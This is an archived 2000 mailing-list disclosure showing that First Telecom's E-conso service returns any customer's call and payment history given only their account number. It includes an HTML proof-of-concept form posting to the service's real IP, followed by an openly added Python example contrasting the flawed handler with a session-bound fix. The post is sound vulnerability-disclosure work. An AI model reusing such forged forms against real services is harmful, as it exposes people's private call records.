First Telecom E-conso service totally insecure

From: Thomas Quinot (thomasat_private)
Date: Mon Jan 03 2000 - 15:10:30 PST


First Telecom, a company that provides a pre-paid calling card service
in France, Germany and the United Kingdom, offers a service
called E-conso which allows subscribers to check the current balance
of their account and peruse the history of all calls they made through
First Telecom.

The WWW form at the home page of the service requires entry of
the account number (which is printed on all First Telecom documents
and embossed on the plastic membership card sent to every subscriber),
as well as a password chosen by the customer during the sign-up
procedure.

The submission of this form returns a page which includes the customer's
name and address, and a form (with a /fixed/ "action" URL) which
contains the customer's account number as a "hidden" field.
Submission of this form returns the details of payments or
the call history, depending on which button is clicked by the customer.

No hidden field and no cookie is used to pass any client credentials
back to the server, which means it is trivial to retrieve the details
of past payments as well as the call history of a First Telecom
customer knowing only her (non-secret) account number.

The HTML code included demonstrates this important flaw.

Thomas.
    
---------- cut here : first.html

<html>

<head>
<title>First Telecom e-conso exploit</title>
</head>

<body>
<!-- Same fixed "action" URL as the second form on the real page; the
     account number is the only thing the server uses to pick a customer. -->
<form action="http://195.68.107.69/residential/wc.dll?firstphone~resformbutton" method="POST">
 <p>
Account number: <input type="text" name="cmaster" value="0000000">
<input type="submit" name="cmdcdr" value="Details of calls">
<input type="submit" name="cmdpaymenthistory" value="Details of payments">
 </p>
</form>
</body>
</html>
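The flaw above is that the second request is authorised by a client-supplied, non-secret value (the account number in the hidden field) instead of by the session that was established when the password was checked. The following is an added example, not code from the post or from First Telecom, that models the second form's handler in two versions: one that trusts the `cmaster` field as described, and one that derives the account from a server-side session created at login and treats a disagreeing hidden field as tampering. The account data, passwords, session store and field names other than `cmaster`, `cmdcdr` and `cmdpaymenthistory` are constructed for the example.

```python
"""Added example: binding the 'details' request to an authenticated session.

Everything here is a constructed model of the E-conso flow; it is not
First Telecom's code and does not contact any server.
"""
import secrets

# Constructed sample data: account number -> password, call and payment history.
ACCOUNTS = {
    "1234567": {
        "password": "alpha-pass",
        "calls": ["1999-12-30 +33 1 XX XX XX XX 3 min"],
        "payments": ["1999-12-20 FRF 100"],
    },
    "7654321": {
        "password": "bravo-pass",
        "calls": ["2000-01-02 +44 20 XXXX XXXX 12 min"],
        "payments": ["1999-11-05 FRF 200"],
    },
}

# Server-side session table: opaque token -> account number.  The client
# only ever sees the token, never a value it could pick itself.
SESSIONS = {}


def login(cmaster, password):
    """First form: check the password and issue an opaque session token."""
    acct = ACCOUNTS.get(cmaster)
    # Constant-time comparison so a wrong guess takes the same time as a right one.
    if acct is None or not secrets.compare_digest(acct["password"], password):
        return None
    token = secrets.token_urlsafe(32)
    SESSIONS[token] = cmaster
    return token


def _select(acct, form):
    """Pick payments or calls depending on which submit button was pressed."""
    return acct["payments"] if "cmdpaymenthistory" in form else acct["calls"]


def history_vulnerable(form):
    """Second form as the post describes it: the hidden 'cmaster' field alone
    decides whose data is returned, so anyone knowing an account number wins."""
    acct = ACCOUNTS.get(form.get("cmaster"))
    if acct is None:
        return None
    return _select(acct, form)


def history_fixed(form, cookies):
    """Second form, fixed: the account comes from the session cookie issued by
    login(); the hidden field is at most a consistency check, never a selector."""
    cmaster = SESSIONS.get(cookies.get("session", ""))
    if cmaster is None:
        return None  # no valid session: refuse, do not fall back to the form field
    # A hidden field that disagrees with the session is a tampering signal;
    # refuse (and in a real server, log it) rather than silently using the session.
    if form.get("cmaster", cmaster) != cmaster:
        return None
    return _select(ACCOUNTS[cmaster], form)


if __name__ == "__main__":
    # Walk through the flow: the attacker-style request works against the
    # vulnerable handler and fails against the fixed one.
    forged = {"cmaster": "1234567", "cmdcdr": "Details of calls"}
    print("vulnerable:", history_vulnerable(forged))
    print("fixed, no session:", history_fixed(forged, {}))
    tok = login("7654321", "bravo-pass")
    print("fixed, own account:", history_fixed({"cmaster": "7654321"}, {"session": tok}))
    print("fixed, other account:", history_fixed(forged, {"session": tok}))
```

The point of the fixed handler is that the account number never participates in authorisation: a request can only retrieve data for the account whose password was checked when the session was created.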
    



    This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:25:43 PDT